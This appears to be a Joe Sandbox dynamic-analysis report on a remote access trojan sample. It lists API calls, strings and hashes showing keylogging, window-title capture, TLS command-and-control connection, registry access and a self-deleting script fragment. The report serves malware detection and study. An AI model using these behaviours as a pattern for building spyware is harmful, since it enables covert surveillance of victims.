                                        • Sleep.KERNELBASE(00000000,00000002), ref: 00415AD7
                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Sleep$ErrorLastLocalTime
                                        • String ID: | $%I64u$4.9.4 Pro$8SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$PSG$TLS Off$TLS On $dMG$hlight$name$NG$NG$PG$PG$PG
                                        • API String ID: 524882891-1970491740
                                        • Opcode ID: 9cb82891bb425c39d1cf50534c3eac14595e9723053b020adc359de55693d3f0
                                        • Instruction ID: 324fc11d7bea0fba9c16e2c7d7b547a311b01f704130931fc4cc70caa797af2d
                                        • Opcode Fuzzy Hash: 9cb82891bb425c39d1cf50534c3eac14595e9723053b020adc359de55693d3f0
                                        • Instruction Fuzzy Hash: 22526B31A001155ACB18F732DD96AFE73769F90344F6041BFE40A761E2EF781E858A5D

                                        Control-flow Graph

                                        APIs
                                        • Sleep.KERNELBASE(00001388), ref: 0040A740
                                          • Part of subcall function 0040A675: CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                                          • Part of subcall function 0040A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                          • Part of subcall function 0040A675: Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                          • Part of subcall function 0040A675: CloseHandle.KERNELBASE(00000000,?,?,?,0040A74D), ref: 0040A6EE
                                        • CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 0040A77C
                                        • GetFileAttributesW.KERNELBASE(00000000), ref: 0040A78D
                                        • SetFileAttributesW.KERNELBASE(00000000,00000080), ref: 0040A7A4
                                        • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A81E
                                          • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                                        • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466468,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A927
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                        • String ID: 8SG$8SG$pQG$pQG$PG$PG
                                        • API String ID: 3795512280-1152054767
                                        • Opcode ID: 677456a4732d5fb77e9c8745959e99ef54ead223a942f07a0b0fb3c37e482db7
                                        • Instruction ID: 265ddfea45d140738b9a7e0f0353a6f5be26653907181caffe3561bb72ed66c0
                                        • Opcode Fuzzy Hash: 677456a4732d5fb77e9c8745959e99ef54ead223a942f07a0b0fb3c37e482db7
                                        • Instruction Fuzzy Hash: A7517E716043055ACB09BB32C866ABE739A9F80349F00483FB642B71E2DF7C9D09865E

                                        Control-flow Graph

                                        APIs
                                        • connect.WS2_32(?,?,?), ref: 004048E0
                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                        • WSAGetLastError.WS2_32 ref: 00404A21
                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                        • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                        • API String ID: 994465650-2151626615
                                        • Opcode ID: 0e1f48393a4dbf35559e3b54531825a3ac2d5840eb8be2a17852ea70254c2e78
                                        • Instruction ID: c5d57dbf39bf42eeb7f1fe8451fa1a1ddda5cb55b73798f96fdafd5064c5310c
                                        • Opcode Fuzzy Hash: 0e1f48393a4dbf35559e3b54531825a3ac2d5840eb8be2a17852ea70254c2e78
                                        • Instruction Fuzzy Hash: 3E41E8B47406016BD61877BA8D1B53E7A15AB81304B50017FE60267AD3EB7D9C108BDF

                                        Control-flow Graph

                                        APIs
                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                        • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                        • CloseHandle.KERNELBASE(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                                        • closesocket.WS2_32(000000FF), ref: 00404E5A
                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                                        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                                        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBF
                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EC4
                                        • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                                        • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED6
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                        • String ID:
                                        • API String ID: 3658366068-0
                                        • Opcode ID: 0463b1faaa3f7a02a97a49212c31dd980e99cbb732c39645afe60185321c9919
                                        • Instruction ID: 0c11cd9b042c69dc9d4dd2828563f6d61870a883144e53252efabab5b24bcc37
                                        • Opcode Fuzzy Hash: 0463b1faaa3f7a02a97a49212c31dd980e99cbb732c39645afe60185321c9919
                                        • Instruction Fuzzy Hash: BF21E871104B04AFDB216B26DC49B27BBA1FF40326F104A2EE2E211AF1CB75B851DB58

                                        Control-flow Graph

                                        APIs
                                        • __Init_thread_footer.LIBCMT ref: 0040AD38
                                        • Sleep.KERNELBASE(000001F4), ref: 0040AD43
                                        • GetForegroundWindow.USER32 ref: 0040AD49
                                        • GetWindowTextLengthW.USER32(00000000), ref: 0040AD52
                                        • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040AD86
                                        • Sleep.KERNEL32(000003E8), ref: 0040AE54
                                          • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                        • String ID: [${ User has been idle for $ minutes }$]
                                        • API String ID: 911427763-3954389425
                                        • Opcode ID: af3cf2329a29d0ead1f6790201367748a0b563353980fa9fd476e2dccae2fe78
                                        • Instruction ID: 3d5ee5432c15115af2c0f1375ae13a0ba8112eb59c463c5c733e63bb31497985
                                        • Opcode Fuzzy Hash: af3cf2329a29d0ead1f6790201367748a0b563353980fa9fd476e2dccae2fe78
                                        • Instruction Fuzzy Hash: 6D51B1316043419BD314FB21D846AAE7796AB84308F50093FF586A22E2EF7C9D45C69F

                                        Control-flow Graph

                                        APIs
                                        • GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 0040DB9A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LongNamePath
                                        • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                        • API String ID: 82841172-425784914
                                        • Opcode ID: da5f0060826a558894883e6bfc0be8872fb7d3565c3035b4badf37544c73e64a
                                        • Instruction ID: 0cc8b9c4d8a16f3fd89327f32322cd7e2fd47b59120d3573c9b2d8a81569e3eb
                                        • Opcode Fuzzy Hash: da5f0060826a558894883e6bfc0be8872fb7d3565c3035b4badf37544c73e64a
                                        • Instruction Fuzzy Hash: FB414F715082019AC215FB61DC52DAEB3F8AE90718F10053FB546A60E2FFB8AE49C65F

                                        Control-flow Graph

                                        APIs
                                        • CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466468,00000000,00000000,0040D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C430
                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002), ref: 0041C44D
                                        • CloseHandle.KERNEL32(00000000), ref: 0041C459
                                        • WriteFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 0041C46A
                                        • CloseHandle.KERNELBASE(00000000), ref: 0041C477
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseHandle$CreatePointerWrite
                                        • String ID: hpF
                                        • API String ID: 1852769593-151379673
                                        • Opcode ID: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                        • Instruction ID: 5cb8be75c3dc4c1e2f747800af3fbfd5a98fa41e64789a84fd548ad7506a8702
                                        • Opcode Fuzzy Hash: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                        • Instruction Fuzzy Hash: B0110471288220FFEA104B24ACD9EFB739CEB46375F10462AF592C22C1C7259C81863A

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                          • Part of subcall function 004135A6: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                          • Part of subcall function 004135A6: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 004135E7
                                          • Part of subcall function 004135A6: RegCloseKey.KERNELBASE(?), ref: 004135F2
                                        • StrToIntA.SHLWAPI(00000000,0046C9F8,00000000,00000000,00000000,004750E4,00000003,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0041B33C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseCurrentOpenProcessQueryValue
                                        • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                        • API String ID: 1866151309-2070987746
                                        • Opcode ID: 8f8f5d60ce35d1a1c8195802feeff86a127f68f3eb7fb2a0a498f7b0ec669ebf
                                        • Instruction ID: 0537cd1ef0e49ffa1b211e53375311a7de90e31f2ded896f28e78de68f6ce99c
                                        • Opcode Fuzzy Hash: 8f8f5d60ce35d1a1c8195802feeff86a127f68f3eb7fb2a0a498f7b0ec669ebf
                                        • Instruction Fuzzy Hash: 42112370A4010566C704B3668C87EFF77198B95314F94013BF856A21E2FB6C599683AE

                                        Control-flow Graph

                                        APIs
                                        • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                        • Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                        • CloseHandle.KERNELBASE(00000000,?,?,?,0040A74D), ref: 0040A6EE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseCreateHandleSizeSleep
                                        • String ID: XQG
                                        • API String ID: 1958988193-3606453820
                                        • Opcode ID: ed692bf81f71d99d64d0e48405d0f3cb823898ebec9c5078a7592842c921da17
                                        • Instruction ID: 2d5b847f40b6dc6d65e682cb961bc0859910b41d7418e35cc132b68a4a9af338
                                        • Opcode Fuzzy Hash: ed692bf81f71d99d64d0e48405d0f3cb823898ebec9c5078a7592842c921da17
                                        • Instruction Fuzzy Hash: AD112B30600740EEE631A7249895A5F3B6AEB41356F48083AF2C26B6D2C6799CA0C35E

                                        Control-flow Graph

                                        APIs
                                        • CreateThread.KERNELBASE(00000000,00000000,0040A27D,?,00000000,00000000), ref: 0040A1FE
                                        • CreateThread.KERNELBASE(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040A20E
                                        • CreateThread.KERNELBASE(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 0040A21A
                                          • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                                          • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateThread$LocalTimewsprintf
                                        • String ID: Offline Keylogger Started
                                        • API String ID: 465354869-4114347211
                                        • Opcode ID: e8215c935415644a741e178cef246bea46bfec4a592ac60f75e4063261735619
                                        • Instruction ID: bcf1cfbdc14a627f6781ea3a40f7cea6448602225ce5b2be95dc640702f6c2bd
                                        • Opcode Fuzzy Hash: e8215c935415644a741e178cef246bea46bfec4a592ac60f75e4063261735619
                                        • Instruction Fuzzy Hash: DE1194B12003187AD220B7369C86CBB765DDA8139CB00057FF946222D2EA795D54CAFB
                                        APIs
                                        • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
                                        • RegSetValueExA.KERNELBASE(?,004674B8,00000000,?,00000000,00000000,004752F0,?,?,0040F853,004674B8,4.9.4 Pro), ref: 004137A6
                                        • RegCloseKey.KERNELBASE(?,?,?,0040F853,004674B8,4.9.4 Pro), ref: 004137B1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseCreateValue
                                        • String ID: pth_unenc
                                        • API String ID: 1818849710-4028850238
                                        • Opcode ID: 4f15aeb283403f146db3f09acdab1127f952c22a8adcae04a958ae624d8eac3f
                                        • Instruction ID: c04290829ccef693e4e8b5b7d06cdf9a2950efbbd707a4c1379ff92f90edcb59
                                        • Opcode Fuzzy Hash: 4f15aeb283403f146db3f09acdab1127f952c22a8adcae04a958ae624d8eac3f
                                        • Instruction Fuzzy Hash: B8F06272400118FBCB009FA1DD45DEA376CEF04B51F108566FD09A61A1D7359E14DB54
                                        APIs
                                        • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0040D078
                                        • GetLastError.KERNEL32 ref: 0040D083
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateErrorLastMutex
                                        • String ID: SG
                                        • API String ID: 1925916568-3189917014
                                        • Opcode ID: 39599091def79051ab742ff046aa9e12e6026389991bc8d246940820909dc324
                                        • Instruction ID: 95155ffd2f5cf2c34283977deb482d2843c3ccfb5002447f486bda260673b364
                                        • Opcode Fuzzy Hash: 39599091def79051ab742ff046aa9e12e6026389991bc8d246940820909dc324
                                        • Instruction Fuzzy Hash: 18D012B0604701EBD7181770ED5975839959744702F40487AB50BD99F1CBAC88908519
                                        APIs
                                        • send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                        • WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                        • SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: EventObjectSingleWaitsend
                                        • String ID:
                                        • API String ID: 3963590051-0
                                        • Opcode ID: a00f43e109d8a5bcbea84027ff4f42fb49a7104e756b4714260ac134e081549c
                                        • Instruction ID: 83b425c638d75041f18e819343fb0b0c123ba7f8272f9a3a5816098776915250
                                        • Opcode Fuzzy Hash: a00f43e109d8a5bcbea84027ff4f42fb49a7104e756b4714260ac134e081549c
                                        • Instruction Fuzzy Hash: A52126B2900119BBCB04ABA1DC95DEE773CFF14314B00452BF515B21E2EE79AA15C6A4
                                        APIs
                                        • RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                        • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 004135E7
                                        • RegCloseKey.KERNELBASE(?), ref: 004135F2
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseOpenQueryValue
                                        • String ID:
                                        • API String ID: 3677997916-0
                                        • Opcode ID: 047bda59581c7e78827521e08e68fdf793dfebd6250409dd5ae19ad748ced965
                                        • Instruction ID: 357f89d7cd1c8cc036c5e31f86fe90e90b696c4569df010e686479b524d11f87
                                        • Opcode Fuzzy Hash: 047bda59581c7e78827521e08e68fdf793dfebd6250409dd5ae19ad748ced965
                                        • Instruction Fuzzy Hash: 5A01D676900228BBCF209B91DC09DEF7FBDDB84751F000066BB09E2240DA748E45DBA4
                                        APIs
                                        • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 00413714
                                        • RegQueryValueExA.KERNELBASE(00000000,00000000,00000000,00000000,00000208,?), ref: 0041372D
                                        • RegCloseKey.KERNELBASE(00000000), ref: 00413738
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseOpenQueryValue
                                        • String ID:
                                        • API String ID: 3677997916-0
                                        • Opcode ID: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                        • Instruction ID: 3f277cad741e4f631881634228dfc272d65c1146f3ef4f3c344e6cfa7cb73972
                                        • Opcode Fuzzy Hash: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                        • Instruction Fuzzy Hash: 1C018BB1400229FBDF216FA1DC04DEB3F38EF05751F004065BE08621A1D6358AA5DBA4
                                        APIs
                                        • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 00413569
                                        • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004752F0), ref: 00413587
                                        • RegCloseKey.KERNELBASE(?), ref: 00413592
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseOpenQueryValue
                                        • String ID:
                                        • API String ID: 3677997916-0
                                        • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                        • Instruction ID: df0ca7b2621da3f23a966dc0a7f3323316399916f3769291e5945d4ebcba47cd
                                        • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                        • Instruction Fuzzy Hash: E8F01776900218FFDF109FA0DC05FEEBBBCEB04B11F1040A6BA09E6191E2359F54AB94
                                        APIs
                                        • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?,00000000,?,?,0040C19C,00466C48), ref: 00413516
                                        • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,00000000,?,?,0040C19C,00466C48), ref: 0041352A
                                        • RegCloseKey.KERNELBASE(?,?,?,0040C19C,00466C48), ref: 00413535
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseOpenQueryValue
                                        • String ID:
                                        • API String ID: 3677997916-0
                                        • Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                        • Instruction ID: ffaae2385a847085e6fb085aa4760e2a706d619ab1068a3de776aab9102a8dd7
                                        • Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                        • Instruction Fuzzy Hash: 46E06D32801238FB9F204FA2DC0DDEB7F6CEF06FA2B000155BD0DA2112E2258E50E6E4
                                        APIs
                                        • RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                        • RegSetValueExA.KERNELBASE(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                        • RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        • API ID: CloseCreateValue
                                        • String ID:
                                        • API String ID: 1818849710-0
                                        • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                        • Instruction ID: 04a42b38e2882b978ed87177a7d0f50f8458418d63be9de7f69fe35b215911ab
                                        • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                        • Instruction Fuzzy Hash: 16E06572500318FBEF115F90DC05FEA7B6CDF04B52F1045A5BF09A6191D3358E549798
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        • API ID: _wcslen
                                        • String ID: pQG
                                        • API String ID: 176396367-3769108836
                                        • Opcode ID: 1f3b91536cece4da7108cf24afec647958326f81796985407c04b0a2ae37731c
                                        • Instruction ID: e6961f6084f98a1e57a9a6385a58e5d20214d93246a99e64d0d6a4ea431d93e1
                                        • Opcode Fuzzy Hash: 1f3b91536cece4da7108cf24afec647958326f81796985407c04b0a2ae37731c
                                        • Instruction Fuzzy Hash: 8111C3319002059BCB15EF65E8529EF7BB5EF54318B10013FF406A62E2EFB8AD05CB98
                                        APIs
                                        • GlobalMemoryStatusEx.KERNELBASE(?), ref: 0041B7CA
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        • API ID: GlobalMemoryStatus
                                        • String ID: @
                                        • API String ID: 1890195054-2766056989
                                        • Opcode ID: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                        • Instruction ID: 2d2b64c70bc766df394076410504e3f9c8f669937c614d63c6700d8895b1c70c
                                        • Opcode Fuzzy Hash: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                        • Instruction Fuzzy Hash: E6D017B58023189FC720DFA8E804A8DBBFCFB08210F00456AEC49E3700E770E8008B94
                                        APIs
                                        • FormatMessageA.KERNELBASE(00001100,00000000,00000000,00000400,?,00000000,00000000,00474EF8,00474EF8), ref: 0041CB09
                                        • LocalFree.KERNEL32(?,?), ref: 0041CB2F
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        • API ID: FormatFreeLocalMessage
                                        • String ID:
                                        • API String ID: 1427518018-0
                                        • Opcode ID: f61b3e4ee492e5c6c8ed6053afc0cdea8308696fa5ae5c0b5b9a4b82b5d7ebf3
                                        • Instruction ID: 02a9d8e2c753fe243ccbc909122ce1ddd8f8b45a09ed5088e6b723b988b0f700
                                        • Opcode Fuzzy Hash: f61b3e4ee492e5c6c8ed6053afc0cdea8308696fa5ae5c0b5b9a4b82b5d7ebf3
                                        • Instruction Fuzzy Hash: 5EF0A434B0021AAADF08A7A6DD4ADFF7769DB84305B10007FB606B21D1EEB86D05D659
                                        APIs
                                        • socket.WS2_32(?,00000001,00000006), ref: 00404852
                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                                          • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        • API ID: CreateEventStartupsocket
                                        • String ID:
                                        • API String ID: 1953588214-0
                                        • Opcode ID: afd00016faedd330142d6470bb716eda446324a36170d88fbab64c940495e811
                                        • Instruction ID: 7af5cc85a36d800a693892934b5c0b91abe86707509305098cc6d5fca1b6a633
                                        • Opcode Fuzzy Hash: afd00016faedd330142d6470bb716eda446324a36170d88fbab64c940495e811
                                        • Instruction Fuzzy Hash: 6E0171B1408B809ED7359F38A8456977FE0AB55304F048D6EF1DA97B91D3B5A881CB18
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
                                        • Instruction ID: 20740d68f627359004b4f50e822579efa7e6dd26000e0d34fcfb16e84f8f3500
                                        • Opcode Fuzzy Hash: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
